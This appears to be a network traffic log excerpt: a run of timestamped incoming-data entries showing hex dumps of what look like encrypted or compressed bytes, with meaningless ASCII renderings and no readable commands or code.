                                                                                                                                                    2022-09-29 12:59:10 UTC15418INData Raw: ee 19 db 81 5d 15 04 38 3b 35 ee 00 a8 62 f1 78 78 c8 e7 e0 2d 30 d5 20 4a f3 14 d0 db 9f 27 62 05 41 f6 87 8e 14 44 22 50 85 a2 88 ce 86 1d 0b 51 3d dc e9 21 9e aa ec 4f a9 67 d9 9e 33 2a e8 4b 88 c7 6d e8 00 2a a5 e7 fb 13 6b 37 94 ac 05 ff b7 7c 63 fe 7a 55 84 04 02 89 5a 68 b9 ef 32 68 48 69 5b 5c ce 50 10 6f 3a 8b ae 97 09 85 fe 40 5c 5f 57 02 6d 87 43 d7 19 3d 14 dd e9 30 cf e2 c7 41 19 38 ec eb 6c 2f 26 5a e0 06 b5 f7 6d 1e 84 b1 ce ea 5d 96 1f 14 9d 28 75 36 3a 16 93 01 af cc f1 a8 53 75 dd 1a ea cc 43 ad db 08 0d 85 a8 a4 76 65 42 3a b8 ec 7e 0c a2 1e 1a 7f 66 f1 dd d7 65 f9 11 b3 f1 65 54 3c 22 12 cc 19 b2 c1 b5 c7 61 70 a5 7d 8e f4 66 e8 03 43 de e4 4a 83 10 76 d7 c4 ec ad 99 26 e8 12 2e db c6 18 b9 e8 72 09 6c b6 36 12 80 c1 3e e3 e8 c1 96 76
                                                                                                                                                    Data Ascii: ]8;5bxx-0 J'bAD"PQ=!Og3*Km*k7|czUZh2hHi[\Po:@\_WmC=0A8l/&Zm](u6:SuCveB:~feeT<"ap}fCJv&.rl6>v
                                                                                                                                                    2022-09-29 12:59:10 UTC15434INData Raw: 18 33 72 df 59 16 3d e6 3c cd bb f7 3e 73 6c a8 97 22 5d 74 8f c3 e2 2a 24 a0 af 38 8b 79 5d ae 42 e9 66 46 2d 84 f1 52 8c 5c 78 e5 32 90 ee ea 61 e3 44 99 de f7 a9 93 5c 9d d0 c9 81 a6 bf be b4 da 07 a1 e4 cb 15 b2 a6 e4 a5 28 61 27 c8 d9 a2 dc 0c 68 ef d6 1c 69 5f 9f 42 5a cb 7d 81 03 af 5e b4 6e 87 dd 5c 1a 49 de 1b 91 7a a0 7b d3 0f 80 e6 e7 99 90 7f bf 17 09 32 a1 33 da 7e 6d 22 bc e3 26 87 d2 db ea d1 72 36 45 f1 8b d1 9c 45 2e 30 6b 6e 7a 16 b8 e8 b1 d9 2d d1 39 52 c9 3f ab 3e d6 95 25 2e e4 69 9d 3d f4 89 bd 38 a5 d0 70 bc 1c 18 e2 38 51 4f 0f f9 86 21 d6 be 70 b2 be 04 83 d8 e8 5b 1b 0b 87 d9 3d 49 f0 2c 22 88 9f e2 be 31 32 de 69 80 dd 1e 15 fb 3a 4c 75 92 2d 39 d9 fe 1f 55 3e c0 45 2a f5 05 1a f2 4a 0e b9 80 18 c4 f0 e7 d2 7c 66 62 d1 0e 2c 79
                                                                                                                                                    Data Ascii: 3rY=<>sl"]t*$8y]BfF-R\x2aD\(a'hi_BZ}^n\Iz{23~m"&r6EE.0knz-9R?>%.i=8p8QO!p[=I,"12i:Lu-9U>E*J|fb,y
                                                                                                                                                    2022-09-29 12:59:10 UTC15450INData Raw: e3 37 1d de dc 21 40 a2 51 db d0 69 43 e1 51 60 45 dc 94 81 94 ea 10 bd 08 9d 7d b1 44 f1 36 94 47 54 c9 1b f3 e4 6b 15 1f 43 4b 42 0f 3e fd 1e 6a c7 5e 74 22 d5 95 66 ca 16 c7 17 a4 72 f1 c5 f7 a8 dd 79 ad 15 51 3b 9c 38 c5 b6 7e 10 f8 4c 39 41 e8 02 30 bc 3d 01 0d 60 e7 8d ce 2f bd 64 73 21 70 6b 0a b4 08 2c ff 23 e9 3e d7 49 3c eb a7 11 82 99 a4 ae aa 41 03 12 9e f8 03 93 56 02 f8 69 99 ed 40 65 34 6b 9b 29 23 95 5b 4d 97 ec b8 04 71 43 22 f0 aa 61 98 fc c9 02 9f 33 f3 82 99 78 0a da 73 59 b4 85 e3 50 fc 33 51 8f 16 f2 6f 33 88 38 4d 2a de 53 69 96 86 16 c5 b7 39 8a de 57 2b 93 de 93 1a db d9 7a d8 29 39 f7 a5 89 ea a6 3d b3 c3 65 a5 df 9c 57 d4 66 c3 56 db 23 8a 49 cf 91 34 d0 55 51 c1 ce ff 16 6b d8 c5 e8 84 b7 a5 82 b4 d3 3e 6d d9 f1 ed 14 df ed a7
                                                                                                                                                    Data Ascii: 7!@QiCQ`E}D6GTkCKB>j^t"fryQ;8~L9A0=`/ds!pk,#>I<AVi@e4k)#[MqC"a3xsYP3Qo38M*Si9W+z)9=eWfV#I4UQk>m
                                                                                                                                                    2022-09-29 12:59:10 UTC15466INData Raw: 60 9c f1 40 8b c3 47 b4 c1 97 a4 a9 08 c6 d1 49 64 01 fb 8e 99 51 59 52 38 a9 ec 4e d1 e3 df f2 73 5f 88 21 0c 19 49 cb e8 b1 8b e2 b7 f3 f0 15 a6 27 df 4f 02 2d 12 e5 09 55 e9 d5 f2 80 90 98 4c 74 68 bd 50 75 88 50 03 62 38 b0 6b 5f a7 5e 71 24 eb 84 b2 b4 19 fb 98 3b 9b 21 7d 17 68 ab 05 1d 86 a2 dd 74 e5 26 e4 2f f9 16 f7 fd f9 f3 ca 82 d5 3c ee e4 d5 76 f3 3d ca 45 59 7a 5f 20 29 01 6b d7 f9 fb 44 8d 76 3c a1 5c ce c1 20 80 f5 cd a7 c5 e6 42 8c 88 26 7e dd 82 eb 1c 58 09 cd f7 3c 1f f1 4c 1b 30 6d 72 d7 dc 8b fb 69 0b b2 38 40 8d c0 46 3c b3 0f 5f 47 26 7a 37 fb 1a 4b 35 7c 51 32 f3 09 74 d6 78 73 be 07 b3 49 4d b0 9c 1c bd 01 26 c4 c5 08 7b 2d a6 ed 75 cc 0f 59 25 be 53 c4 b5 ef 31 43 58 90 0d b3 39 0a 4c e2 82 29 28 ac 1e 3a 56 1c 4e 93 f2 9c 9b ae
                                                                                                                                                    Data Ascii: `@GIdQYR8Ns_!I'O-ULthPuPb8k_^q$;!}ht&/<v=EYz_ )kDv<\ B&~X<L0mri8@F<_G&z7K5|Q2txsIM&{-uY%S1CX9L)(:VN
                                                                                                                                                    2022-09-29 12:59:10 UTC15482INData Raw: d3 e0 05 74 10 16 83 95 65 35 de 3a 27 72 b7 42 f8 82 4d 51 fa cb 4f a1 1a 45 69 ab c1 83 26 6d 1c 29 50 12 36 2c e0 21 f1 28 0e 87 1a b4 2c ee 00 0a 91 be 74 81 ce 58 2e 63 66 d9 69 70 7d c9 2b da 01 5b 27 37 e1 1d 06 a8 81 6b 35 90 9c e3 13 b3 28 32 3b dd ac c4 6d c2 6a 2b 5c 0a 1a ca a5 94 13 78 7d 2b 67 2a 6c 78 3e 4c c7 a1 46 fc cb e6 fd 50 1c dc da cc 5d 6d 48 ed f4 90 8a d7 09 66 3b 82 2d f7 bc 6b 86 98 15 10 7b 71 1c 93 95 52 bf 40 f9 ba 37 e3 7c a3 b3 89 3f 93 31 49 cb c4 38 15 b3 93 2b 14 da 6f 79 93 41 2d 07 40 18 3c 4c 36 c6 cc ec b0 81 81 eb f5 1b 7e 1d 4b c9 98 2d 0b c1 b9 73 cc 6a b9 73 41 d0 74 0c 9e c3 10 8b 99 84 c1 b0 e2 a1 d8 5c dc 56 50 5c b4 b9 c2 af f5 30 44 a9 ba a2 ee f8 03 74 9a db e3 34 e5 0c 79 ac e1 13 f2 89 e6 13 84 f4 3b 1f
                                                                                                                                                    Data Ascii: te5:'rBMQOEi&m)P6,!(,tX.cfip}+['7k5(2;mj+\x}+g*lx>LFP]mHf;-k{qR@7|?1I8+oyA-@<L6~K-sjsAt\VP\0Dt4y;
                                                                                                                                                    2022-09-29 12:59:10 UTC15498INData Raw: 18 84 ac d4 14 ab d3 9a 2b e3 b9 a1 d2 88 95 e0 69 bd ce bc 40 6a a0 26 45 96 72 80 2e 86 fe 06 d0 03 20 40 bc 8e e8 39 6e ea eb d3 b9 5b 23 c3 35 aa ba 44 46 9a 3f 43 4c de 88 4d d1 bd 1c 15 16 17 bb 4d fa 8c 3b 7f e3 9a e8 57 7b 50 d6 ef 1e 0c 5b 33 b4 34 65 4e 64 6b 08 b4 da 0b a2 ed aa 12 65 95 4d fb 0b 9e 45 07 ea 54 9f 31 bd 5a 55 9c ba 32 dc 8f 3b 90 b5 f4 96 76 d3 26 99 0d 6a 43 cf ee b3 06 cd b2 ba cf f8 a4 20 17 47 af 94 36 b7 b6 9a ff 8a e0 cb 85 b5 8d e0 4d 9a e6 0b 92 de f1 9f 48 c7 a2 e1 e9 df 47 8c e0 3b 1b 34 07 f4 94 8e 9e a1 64 03 68 ca 54 05 5a ee 1b 3c ea dd f4 73 20 dc e8 c7 23 a6 0a d4 c2 75 46 01 d9 fe 32 a1 54 df d8 88 15 ce de 73 7b be ed b6 4f 34 b3 21 29 7e b0 da 0c 3f 03 f6 e9 2f c6 a4 65 27 09 82 5e 2d 0d 7d ad d9 ad 00 0d 82
                                                                                                                                                    Data Ascii: +i@j&Er. @9n[#5DF?CLMM;W{P[34eNdkeMET1ZU2;v&jC G6MHG;4dhTZ<s #uF2Ts{O4!)~?/e'^-}
                                                                                                                                                    2022-09-29 12:59:10 UTC15514INData Raw: 72 cf 60 7e 7a e0 44 f5 14 74 96 69 b2 84 21 83 2b 7c 2f 76 68 f5 1f 66 b5 8f fb bd a7 af ba b2 4f dc d5 fb d2 7f c4 39 67 04 27 fa 51 a2 0e 9a c3 f9 e3 c2 d6 89 4d b5 12 51 ec 44 0c 82 dc 81 93 ec cf 87 81 59 73 ff 10 ab 28 78 f1 d9 cf 2f e5 cd d7 65 d9 54 ae 50 02 fe 2a 92 cf e4 d3 b3 06 63 50 7c fa b4 de 6b 57 85 a6 3f 31 15 50 80 b9 da 15 76 2f a2 b0 52 65 2a 76 f3 ae 54 68 19 68 ad 69 eb 44 9b fc bc b9 e8 0b 58 44 14 a8 aa e5 c6 a7 d1 f6 68 44 4e 33 23 48 95 0f c7 ee 1a 89 9e bb 5a 21 8d 1b 98 7e c7 e3 31 ae 3f 9a a4 03 64 32 01 af 22 3d dc 57 4a 71 e1 87 6b 8e eb 56 10 05 bb 05 ba 23 22 f5 17 7a 1c 31 37 73 43 b8 a4 0a 7a 3d 48 37 49 5f 0b fa 3f b8 6e ea 73 d0 4d c4 15 85 3b aa af ac 49 af 99 b1 7a 14 f5 cc 0b 0d 3c 15 32 11 3f 61 87 7e 48 fc 1e 6c
                                                                                                                                                    Data Ascii: r`~zDti!+|/vhfO9g'QMQDYs(x/eTP*cP|kW?1Pv/Re*vThhiDXDhDN3#HZ!~1?d2"=WJqkV#"z17sCz=H7I_?nsM;Iz<2?a~Hl
                                                                                                                                                    2022-09-29 12:59:10 UTC15530INData Raw: 6a 30 1a 6a 12 e4 83 43 6c 37 fa d8 83 fa ee 2e fd 55 ea fe ce 9d d0 97 c4 ae 60 7c 23 6e 1c 75 ba 22 fd b9 db 65 29 7d be c2 c0 9c 2a f3 2b 5b dd 52 32 d2 6f 0e dd c2 b2 35 b1 3e 12 c2 84 66 98 a5 d7 16 31 00 10 43 31 f9 73 f9 cd f6 37 89 c2 ee 42 2a 08 ae 5b e7 4b 4c 0b d1 b9 52 0d 50 68 c0 51 24 d4 fd 5b fa 22 f7 cd 53 8f 79 ad 39 67 c8 09 a2 9d e9 47 c6 54 75 4f ae 91 17 a1 46 bf 8c bd b7 00 c0 23 1e 22 f9 8d 88 b9 4b 13 3b b2 99 25 f6 a7 00 fb 96 f2 ee 9b a9 b0 e9 95 64 af 1b 6d f6 52 f9 56 f0 6c 05 80 2f e4 fe 03 b7 f1 e3 e8 7a 7c be 64 3f 43 b2 6c eb 7c 85 fe dd 0d 55 95 32 b2 00 36 88 ff 9d d0 0d d3 fd 99 f7 16 63 6b 88 51 9d 21 df 6b 49 69 e7 d3 fe b3 02 0b 08 7b fa 69 3a 04 4d 5f 3a e1 16 fa 96 0b 65 21 4a 76 1b 72 f1 ea 6f 27 41 6a 9a b7 67 17
                                                                                                                                                    Data Ascii: j0jCl7.U`|#nu"e)}*+[R2o5>f1C1s7B*[KLRPhQ$["Sy9gGTuOF#"K;%dmRVl/z|d?Cl|U26ckQ!kIi{i:M_:e!Jvro'Ajg
                                                                                                                                                    2022-09-29 12:59:10 UTC15546INData Raw: 4d 3c c5 6e 4d ce 96 39 1f 2f db 75 8d 97 f0 dd 83 6c 19 7b 6f 7c 41 d3 81 72 71 2f 71 06 88 8b 63 f3 24 9b 45 0e a2 65 df 74 4f 83 6f 9d 97 8a f0 cc ba 0d 84 17 0c 37 21 82 58 17 bb b9 0b 99 06 72 27 e6 13 a6 ea 7e 4b 4b 36 ad 7f d1 25 c7 6f 73 0d ef f9 21 09 b3 3a 14 af e8 83 df d3 5e fb cb 7c 4d ef 9f 35 13 d8 aa a0 05 0b d3 d7 77 c6 e3 04 2d 6b 2a 0f 61 1e 2f a2 64 7c d9 b7 1f 5a fa cd 64 c1 88 28 49 56 b3 b5 e6 81 e0 3c 0f a6 fa 76 42 6d d9 25 a9 db 5c 6c ba 46 9e 6c aa c6 3a 59 ca 5e 8a ef ce 87 5e bd 61 86 bb 61 35 8c 2a 40 87 79 51 6d cf c7 2d 37 6d 9a b8 7b 83 98 ee 3d cf 4d 93 70 64 90 79 28 7e 4a e7 39 9e 16 39 f4 ad 8e c1 c5 07 05 33 a8 22 0a ab 0b 18 fe 5a 14 51 1b 5c 34 bd af c6 f6 3c 9e f5 9b 9c 62 a2 88 20 91 f5 97 91 f0 c7 7e c6 28 d2 e8
                                                                                                                                                    Data Ascii: M<nM9/ul{o|Arq/qc$EetOo7!Xr'~KK6%os!:^|M5w-k*a/d|Zd(IV<vBm%\lFl:Y^^aa5*@yQm-7m{=Mpdy(~J993"ZQ\4<b ~(
                                                                                                                                                    2022-09-29 12:59:10 UTC15562INData Raw: 7b 65 b7 ee a2 af ec 5b cc 9a f9 ff 4e 30 cf 23 72 30 06 53 45 ea ba 56 20 72 eb ff a9 a2 ea 7d be 9f b6 51 58 e1 4b e9 52 bb ac 20 96 61 8d 4c dd 91 1b fe 08 f7 f2 b4 97 b3 49 9a 8a 0e 38 38 26 58 0d a6 4c e9 4b 50 6d 0b e4 9f b7 ef 62 d8 39 ae 8b ab e8 53 97 24 04 70 1e f2 60 95 88 d8 18 c8 e6 6f 1b 73 26 b6 72 99 c4 cf 37 1e e4 c9 e9 6f 88 7c 8d e8 30 3d e9 67 6a 40 17 05 91 8c 17 98 b2 31 9c c6 52 6a e1 79 17 aa aa 24 d4 a1 3c 80 3d 0e ef db 47 3c a9 c6 67 51 0a 17 dd b7 ed dc e9 ad f3 7b 12 ae 7b 68 21 cc 0a ef 69 ac ad 10 f6 ee d1 4c d1 75 cd ef 6e 6a 2a f6 f7 04 64 e0 0b a1 a1 02 3a 7f 8b f6 8d a5 4f f4 4a 58 e4 14 ce c2 0a 06 7b a1 1c 49 95 15 16 39 99 37 e7 ab 13 29 ec 2e 5d e3 57 3a 81 77 75 78 09 16 83 03 02 5e e4 23 f8 ae 0c 84 df e3 bf b4 d2
                                                                                                                                                    Data Ascii: {e[N0#r0SEV r}QXKR aLI88&XLKPmb9S$p`os&r7o|0=gj@1Rjy$<=G<gQ{{h!iLunj*d:OJX{I97).]W:wux^#
                                                                                                                                                    2022-09-29 12:59:10 UTC15578INData Raw: 82 ee be 58 64 39 ef 02 f5 35 19 67 30 67 1c 35 d8 53 7a 08 ef 66 9a 3f ed 33 1f 46 74 d0 03 fe c7 eb fe b0 96 1c 06 e3 34 7b 5a 9e b6 e8 0f 72 39 ed ad e5 42 9e 3d 42 1a b2 3b 69 19 b5 89 85 14 55 55 d4 ba 6b 77 9a 44 22 33 65 12 7c bd 53 8a 4c 52 78 8e e8 51 c9 99 0f ea da 4f 31 2f 1d 96 2a e7 2b ef 0f a7 ba a6 bf 17 35 a2 2d 57 4a e4 44 a4 ba 66 74 c3 5f 1f 40 a7 86 46 ab 7e fc fe e7 98 f0 8e 95 98 52 f9 11 0c 93 81 89 ba da 07 12 9c 4b 42 88 d3 bf 5f 85 91 62 71 86 ca 30 f7 6f ba 36 d1 2f bb e8 ee f2 f7 eb 68 1b 03 cf b0 88 04 19 db 73 53 36 8e 4f 87 cf 46 38 22 e4 50 a3 28 bf 45 65 a8 5d 36 29 16 03 f6 aa 9f 80 3f a8 2c e5 52 31 71 fd 8f e4 6b 25 10 fc fc 17 7f b8 c8 4d 5a 8d d3 01 c4 e3 8c 00 41 c5 90 d8 6e 48 56 a4 fb bf 31 8d b5 fd f9 50 9b 7f 41
                                                                                                                                                    Data Ascii: Xd95g0g5Szf?3Ft4{Zr9B=B;iUUkwD"3e|SLRxQO1/*+5-WJDft_@F~RKB_bq0o6/hsS6OF8"P(Ee]6)?,R1qk%MZAnHV1PA
                                                                                                                                                    2022-09-29 12:59:10 UTC15594INData Raw: 7c 85 44 89 51 77 e8 09 4b d1 4c bf bd 2c 4f c4 93 e3 d0 0b 77 8a 7d 3c 79 81 fa 66 40 ac b3 f7 b1 b1 b6 25 67 8e 6f 06 89 eb 32 a6 5c 33 54 29 e4 7a 3b 54 9b 0a d8 c2 bb 32 dc d9 3e 60 31 11 cc 1c 38 f8 49 33 a5 5b b4 ce 29 c4 fb 62 e9 2e ec 41 ed 59 3b 20 38 ec 32 f9 d7 34 c1 15 bf 5b 8a 32 ec 68 74 90 99 40 70 8b ad 48 77 b7 d6 76 b0 33 8e 8a 77 ef 54 1e 13 4a c6 33 e3 96 f0 fd 51 7d a1 a1 6d dc d7 a9 3c 9e 88 f9 69 7f 9b 3e 76 7a 8c b5 13 d6 6d 61 3b e8 48 99 8d 8e 4a d3 45 5b 05 39 a3 9a 70 ba c2 5e d8 25 0e 13 15 52 33 66 6c 38 c5 f0 14 d9 5f 84 24 73 c1 eb b6 a1 57 45 4b 09 b9 64 77 80 2e 20 c9 44 6b 6a a4 e3 87 de 16 d4 5f 0b 1e 34 03 d1 82 12 50 7d f3 63 8f f4 2c d7 53 e6 ac 74 0c a0 de 8b d8 61 a8 31 0e 97 ec 23 21 20 54 a7 9d 1d 30 5f 61 89 cd
                                                                                                                                                    Data Ascii: |DQwKL,Ow}<yf@%go2\3T)z;T2>`18I3[)b.AY; 824[2ht@pHwv3wTJ3Q}m<i>vzma;HJE[9p^%R3fl8_$sWEKdw. Dkj_4P}c,Sta1#! T0_a
                                                                                                                                                    2022-09-29 12:59:10 UTC15610INData Raw: b0 a8 00 94 b7 08 5d 7f 77 e2 25 01 97 06 05 ce cc a7 6d 63 a7 24 8d 69 da 1d 6e d0 11 00 95 95 53 fe fc 85 c4 cd 84 01 b9 27 c3 b8 93 76 69 2a 6f 7f 6d 71 15 47 90 bc eb ce 2f 87 59 4d f3 0e a4 2f a9 f2 e4 c0 30 88 d2 68 11 20 14 a8 c2 0f 64 da 3c 72 f8 bc 26 16 76 04 4e ef 81 3b 2f 74 b7 42 49 7c 95 72 3a 67 74 86 95 6d 79 1d dd 7c 8c 15 5e dc d5 01 8f 6f b0 13 3e 71 21 5f 11 6e 0f ff 45 22 a7 30 a0 ff 2b 4a 53 36 28 94 23 7f fe d9 b6 4e a4 89 d1 d3 d8 2d ce e7 43 6f 44 91 c5 00 2f 5c c5 9e 89 91 f1 ed 41 4a 23 b6 90 f9 41 f3 2a 29 e9 47 a9 67 da 48 d7 70 85 fc 7c 0c cc c7 7d 12 75 a6 82 8f 90 be a8 0e 70 7e 00 a0 c4 4c f9 b5 c7 c7 06 b4 43 12 ee db 30 95 4d 69 d6 00 d5 9a d4 55 b4 64 ea fa 36 d2 57 28 96 85 dd 25 e4 df 3e 77 24 70 bb 32 ef 5f bb 67 e8
                                                                                                                                                    Data Ascii: ]w%mc$inS'vi*omqG/YM/0h d<r&vN;/tBI|r:gtmy|^o>q!_nE"0+JS6(#N-CoD/\AJ#A*)GgHp|}up~LC0MiUd6W(%>w$p2_g
                                                                                                                                                    2022-09-29 12:59:10 UTC15626INData Raw: 3c de a1 97 0e 60 90 76 d8 8e 4f 9c 22 e6 0b 6e 94 06 ac 72 56 9c 6d fb 1a 15 9a cc 68 65 0b 35 95 d3 b5 eb ba c9 bf ba ef cf 42 f7 99 ce a1 80 69 67 a5 cc 99 47 0f 4b de b5 06 85 02 5d 2f f9 0a 7e 77 0c 1e 83 ed 06 18 dc 91 5e 40 bf 54 f1 65 fc 40 0a b0 b5 5a c0 ff 40 c6 65 5e 7a 12 c4 ab 2c 23 aa 0a f4 f7 f0 30 83 4e 7d 4f 8b 6a 58 9d ab d0 99 1f a3 b5 2f ab 91 59 ce 5e 80 22 5e 07 4d 71 68 da da 94 26 27 68 87 c9 2d ea 21 2a c7 df 41 88 aa 46 2a 16 da 55 4c 57 7c df 89 44 61 3a 06 03 29 b5 ce 73 4d 40 4e c5 ea 0e cd 85 b6 d9 cb 30 3d 67 22 c5 41 7f 7e 76 9c ed dc b6 ff 1b 0d a3 3f 7a 0a 08 00 0f 1b 22 3b be 52 8c 68 fe 0c 0d 30 fe c5 c7 ba dc a3 b6 b7 a8 33 9f c3 2b b8 73 9c c0 71 76 7d b7 ab f3 19 86 a7 0e 18 73 ca 5c d1 6d 40 b0 3f 6c a8 da 7a e6 80
                                                                                                                                                    Data Ascii: <`vO"nrVmhe5BigGK]/~w^@Te@Z@e^z,#0N}OjX/Y^"^Mqh&'h-!*AF*ULW|Da:)sM@N0=g"A~v?z";Rh03+sqv}s\m@?lz
                                                                                                                                                    2022-09-29 12:59:10 UTC15642INData Raw: be a1 55 cc 57 1f 7a 58 2e 7a dd 5e 9b 24 2b 7d 27 d2 02 20 f4 93 54 e7 f1 ad b9 6b 72 9d 2e 3c 2c 0b 5b 61 cb db a2 3d 75 dc dd e4 ef 2b f5 78 d6 48 8b f3 64 52 f4 70 fd 43 11 7b 5c 84 3c 79 6e 05 10 31 f4 41 97 b6 22 f7 78 c4 c9 dc 24 a3 5b e6 20 64 f9 57 24 d6 4a f7 fe 26 c5 7e 28 8a 94 03 85 1f 07 4b 0d 66 9b da b0 86 3c dd f1 5b e5 2e 08 97 16 43 34 cd 47 ee 9c f9 9d 79 fc 94 d5 87 09 dd d0 f5 6a 8e ba b8 5d 21 ca 32 c8 60 16 3a ba 11 f8 8e 06 3e 86 86 c3 71 b9 79 2c 3a d7 b7 8a b2 f1 c5 fa 24 2b 3f 51 ce ce 16 18 3a 16 38 01 e0 ba 16 4d 63 58 11 88 8b 17 c5 68 ff e4 47 34 78 a0 46 4f 5d c6 8d 8e 9d 87 3f 7a c2 d2 54 74 38 56 7b 0b 04 9a e6 de 88 53 af e1 a9 4c 4d 00 8b 12 60 47 54 55 bf b8 16 e6 6b 60 80 a2 0e c1 3c df 87 c0 e8 70 0b d0 da f2 a3 a8
                                                                                                                                                    Data Ascii: UWzX.z^$+}' Tkr.<,[a=u+xHdRpC{\<yn1A"x$[ dW$J&~(Kf<[.C4Gyj]!2`:>qy,:$+?Q:8McXhG4xFO]?zTt8V{SLM`GTUk`<p
                                                                                                                                                    2022-09-29 12:59:10 UTC15653INData Raw: 6e 09 cd 4f cc 7c 5d 8d 69 3b 9b 92 80 49 11 c0 5b 07 44 c1 ef 7a 2b 73 ed 33 69 c4 3c d3 7a 90 f9 81 a2 c7 67 f1 7b ab 66 14 8d 31 44 e6 18 ce 24 bb 6b 59 a3 11 8f e3 de ab 33 e6 32 f7 89 d1 85 c0 42 15 6f 85 cf aa 73 23 89 22 4c b1 29 e4 d6 53 c9 21 c1 82 de 4c 43 ec 84 f4 e7 c5 65 e8 38 ef 9a c5 2e a2 7c 0c d9 60 f0 5c ff 55 42 7a ee 24 c7 18 7f d1 49 a3 01 3b 34 8c 47 58 37 64 30 14 39 94 14 01 32 ca 23 b3 54 ff c0 0f 6c f5 75 1c d6 72 1a 8c 50 3c 17 27 c3 b2 92 de 6a 68 5b 97 8f 7f 06 34 ee 12 38 bf 0d 3a cd 3d 9a 85 8c 99 3d 27 5d 3b 7a 15 c0 94 2e 03 50 11 1b b7 ef 05 d2 0e da 42 30 d6 6f 52 77 31 83 2c 7a e5 91 6f 20 9a e3 fb bf cc e0 76 30 3b 71 de c1 1c e5 24 f7 24 2a 99 2d 59 b3 95 55 e1 38 6a d5 06 75 4f 24 b4 d6 61 2b 84 6d 3c f5 16 43 ba 1d
                                                                                                                                                    Data Ascii: nO|]i;I[Dz+s3i<zg{f1D$kY32Bos#"L)S!LCe8.|`\UBz$I;4GX7d092#TlurP<'jh[48:=='];z.PB0oRw1,zo v0;q$$*-YU8juO$a+m<C
                                                                                                                                                    2022-09-29 12:59:10 UTC15669INData Raw: b8 1d ba 12 d3 6b 50 46 d4 0e 6d c9 85 5c c1 fc fd e2 3e a7 7e 71 60 ef a8 ab 28 68 71 bc 5a e1 1b 3d 29 81 2d b4 00 7d b0 9d 5e 6a a3 36 79 8f d9 72 44 1b 77 15 b4 7f 4f c5 c6 2d a1 0c 66 6e c4 d7 98 0f 37 59 eb c1 90 c7 5e 03 a2 90 73 df aa 35 5e b3 12 f1 fc 5c ab 7b 68 4b 91 ab 53 3f 0c d7 2f a6 5f 2a a6 d0 43 e4 4e 89 3a 14 83 2e 11 b8 13 b1 4e 28 4b 26 38 53 dd 4f 73 a9 54 b9 31 f0 fd dc 8f 9f 50 e0 dd 69 b5 6b 1c 55 12 2b eb 70 70 b1 20 06 59 13 20 4e fd 2b 14 3f c0 92 98 f6 27 4a af 76 af 6a 9c 21 30 72 1c 62 03 2a cc db 06 bc 9d 83 5e 5a 71 b8 67 6b f7 04 74 0e 4b 75 3a 26 7d b5 f3 18 80 58 7a e9 73 4b 09 c7 68 c7 07 d5 8b c7 f4 d7 c4 38 f0 92 4e 79 f8 f3 a4 65 76 fa 3f 46 88 a2 59 14 d2 4f 5e db 20 3b 5a 9c a3 63 a6 60 b0 0b dc c3 8d a0 47 f6 b3
                                                                                                                                                    Data Ascii: kPFm\>~q`(hqZ=)-}^j6yrDwO-fn7Y^s5^\{hKS?/_*CN:.N(K&8SOsT1PikU+pp Y N+?'Jvj!0rb*^ZqgktKu:&}XzsKh8Nyev?FYO^ ;Zc`G
                                                                                                                                                    2022-09-29 12:59:10 UTC15685INData Raw: 15 ff d3 24 63 ac 67 4f 47 64 f8 46 b1 35 a8 9f a9 2e 74 4e e4 6d 5d 66 04 8a 28 6c fd cf 2e 8c 04 66 c7 2e 8d 71 9a f1 fd 01 4c 4a 85 d7 cc 00 8f f5 41 b2 24 86 9f f5 f9 c4 bf cf 25 2f 1c 3b fb 0c 40 09 c1 65 f8 81 91 e1 b2 80 86 00 d0 2b 9b df 89 8e 92 13 ba 3c 49 52 10 ab 0a da ac 12 da 4e cd b1 9b 8e 86 90 78 68 73 bc 51 90 50 3f 31 d5 c8 51 0a 4e d7 ce 0d ae 52 95 b5 79 a4 22 10 99 07 0e 89 72 6f a3 cc e0 c6 c7 da 55 53 2b b6 5e 2b c8 0a 8f 36 58 26 6c cc 02 2a d6 10 28 1d 48 59 0b 3c 2a 59 1e a0 eb a3 ae cc d8 f4 6b 47 ed a9 25 09 e6 55 42 1b 90 a4 78 50 83 fe cb ce 7f b2 6e fb fa 59 8b 42 d3 39 33 9f 83 b8 08 87 fb ef c7 72 32 de 43 93 b8 12 33 81 d6 43 ba b4 5a 58 e8 2d aa 66 c0 f6 62 aa f1 f8 d6 a9 a5 e9 95 70 d6 7a a0 e9 af 62 b7 8c da 34 3f b7
                                                                                                                                                    Data Ascii: $cgOGdF5.tNm]f(l.f.qLJA$%/;@e+<IRNxhsQP?1QNRy"roUS+^+6X&l*(HY<*YkG%UBxPnYB93r2C3CZX-fbpzb4?
                                                                                                                                                    2022-09-29 12:59:10 UTC15701INData Raw: 7b 3e 7b 88 76 2f d3 a2 a6 c1 45 27 44 55 6a 58 c6 9f ab 45 e7 cb 3d 41 c9 8f b6 02 90 bc b0 e2 49 33 66 6c 28 3a 15 c4 ef 74 05 4f 06 f5 52 7c 96 2f 1f 2c 18 8f ec 5a 0e ba dc a7 46 d9 a5 eb ee 21 97 d4 c6 62 2d 9f a5 31 5e ed 58 f3 fc 85 df e1 f2 58 b1 8b 4d 61 7a 14 eb 34 3c bf 5f ee 4d 38 ae 70 87 cb 69 35 26 46 08 98 44 5e 4e 42 31 04 af ef 55 ba 26 37 3c 8b 88 b1 80 b8 55 a7 c2 b9 29 c3 91 6c cc 50 c5 25 63 4b 32 00 3f 6f d3 20 65 8c df c8 42 e7 db 04 c0 46 a2 14 a0 2f cb e6 39 99 38 20 f6 e9 55 93 18 c1 81 0b 98 ff ef 3d 35 65 1a c2 0c ae f8 c0 4c 98 e4 dc bd fc b0 da 71 fe 8f e9 60 46 19 0f be e9 5d 6b 02 ce c4 3c ad 14 fd ca 48 2c d3 18 a5 6e 88 68 de 19 d6 9e 3c bf b0 71 bd 95 21 50 f5 d3 1b 38 dd 42 81 d2 d7 10 9c 21 5d 3a 4c c7 20 c1 71 ac ee
                                                                                                                                                    Data Ascii: {>{v/E'DUjXE=AI3fl(:tOR|/,ZF!b-1^XXMaz4<_M8pi5&FD^NB1U&7<U)lP%cK2?o eBF/98 U=5eLq`F]k<H,nh<q!P8B!]:L q
